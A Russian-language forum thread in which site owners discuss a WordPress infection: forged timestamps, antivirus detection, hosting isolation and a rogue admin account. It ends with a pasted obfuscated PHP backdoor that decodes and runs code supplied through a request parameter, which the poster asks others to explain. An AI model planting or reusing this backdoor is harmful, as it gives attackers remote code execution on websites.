Вирус на сайте

Информация о дате создания файла в Linux без проблем меняется. Например, командой "touch -t".

АВ могут не ругаться, пока у них в базе не будет сигнатуры вируса. Потом сигнатура попадает в базу и АВ начинают ругаться.

Кстати, ругань АВ не означает 100% гарантии обнаружения вируса. Достаточно часты ложные срабатывания.

Обновления - процедура неприятная, но, как правило крайне необходимая. Постоянно в различных движках находятся всякие дыры и разработчики их затыкают. Не делая обновлений риск быть взломанным сильно увеличивается.

Зависит от настроек хостинга. Если из под пользователя одного сайта есть доступ к другим, то заражение очень вероятно.

Я свои сайты настраиваю так, чтобы Апач работал с каждым сайтом из под своего пользователя. Таким образом, если сайт взломают (а от этого никто не застрахован), доступа к другим сайтам не будет.

Опять же зависит от настроек. Если настроить неправильно, то, можно залить в эту папку PHP шелл, и иметь доступ к другим папкам, а то и гулять по всему серверу.

Почистите, обновитесь и, думаю, вернете свои позиции.

Почему тут точка?

Где реально эти каталоги? Есть ли дубли не на своих местах?

Если тема/плагины с помойки, то всё.

Коды "из интернетов" тоже могут быть всякие.

А чтобы обновлять тему без особых проблем есть механизм дочерних тем.

ЗЫ, И когда ты уже будешь писать в правильные темы и разделы? Сеошник не может найти?

где я еще не правильно написал в раздел? и это так принципиально?

по вашей логике, я искал раздел, и не мог найти/выбрать, куда же мне написать, я же сеошник.

моя логика, я обычно пишу в том разделе, вот и написал туда. про раздел безопасность забыл, точнее 1 раз в нем, а надо было бы по чаще заходить))

если по теме, то нашел еще на других сайтах проблемы, просто подгружается другая мобильная версия, и на зараженных сайтах появляется новый пользователь с правами админа - wp.service.controller. Также есть левые файлы, касперский ругается, и не дает открыть.

Один из сайтов полностью был обновлен, тема в том числе, плагинов минимум, и самые распространенные - All In One SEO Pack, Akismet Anti-Spam и другие.

На этом хостинге есть другие сайты, но пока не заражены. Такое ощущение, что в вп появилась дырка, и сейчас заражают сайты, так как думаю, другие сайты тоже были бы уже заражены.

1. У файла есть разные метки времени, Вы видите те, которые можно изменять. Но есть и та, которую злоумышленник не может произвольно установить.

2. Антивирусы и не будут ругаться при заходе на сайт, они эти файлы не увидят. Но файлы вредоносные, это видно по названиям.

3. Можете и не обновлять, если Вы досконально их проверили и уверены в их безопасности. Ну и самостоятельно следите за актуальностью версий ПО.

4. Если Ваши сайты на одном аккаунте, то заразить можно любой. Не имеет значения, что доступ только к одной папке, оттуда можно выйти куда угодно. Но человек, которого Вы нанимали для работы, ничего вредоносного заливать не будет, если не больной на всю голову.

На позиции сайта наличие вредоносных PHP-файлов никакого влияния не оказывает. Влияют результаты их работы, если они проявились при просмотре сайта.

мне сайт выключили))

---------- Добавлено 15.10.2017 в 21:51 ----------

по ходу на всю голову!

проверяю хостинг постоянно на вирусы, и проверял в начале недели. включил сегодня, а у меня там целый зоопарк ))

совпадение? не думаю))

Стопудово совпадение. Программеру это ни к чему.

Только за последнее время ты неск раз спрашивал про редирект в топике про ВП. Мало того, что топик не для этого (поэтому и ответов нет), так ты ещё и не нашел закреплённый специальный топик для этого.

И это не единственный раз.

Если тебя не интересуют результат, то не очень.

Ты ещё и вещества употребляешь? Бросай это дело.

Такое ощущение, что все безголовые видят проблемы где-то ещё, но только не в себе. И даже тот факт, что у таких проблем нет ни у кого* не заставляет их чуток подумать.

* У кого появляются проблемы с вирями/взломами/етс пытаются их решить. Нормальные отличаются от обиженных тем, что ищут проблему в своих действиях/условиях, а не выдвигают предположения космической глупости.

Видать, массовое заражение WP - я тоже пол-субботы проколупался с вируснёй (Гугл прислал письмо). Хер знает, как пробивают - отключил доступ по ftp и права на htaccess поставил только на чтение - вроде, прекратилось.

Дата не говорит ни о чём - у меня часть вирусных файлов были свежак (13 октября), а некоторые - произвольные старые даты.

И на Солнце пятна от пожаров в Калифорнии :)

нашел на сайте код, подскажите, что значит? очень опасно?

if(isset($_REQUEST['sort'])){	

	$string = $_REQUEST['sort'];

	$array_name = '';

	$alphabet = "wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";

	$ar = array(8,38,15,7,6,4,26,25,7,34,24,25,7);

	foreach($ar as $t){

	   $array_name .= $alphabet[$t];

	}

	$a = strrev("noi"."tcnuf"."_eta"."erc");

	$f = $a("", $array_name($string));

	$f();

	exit();

}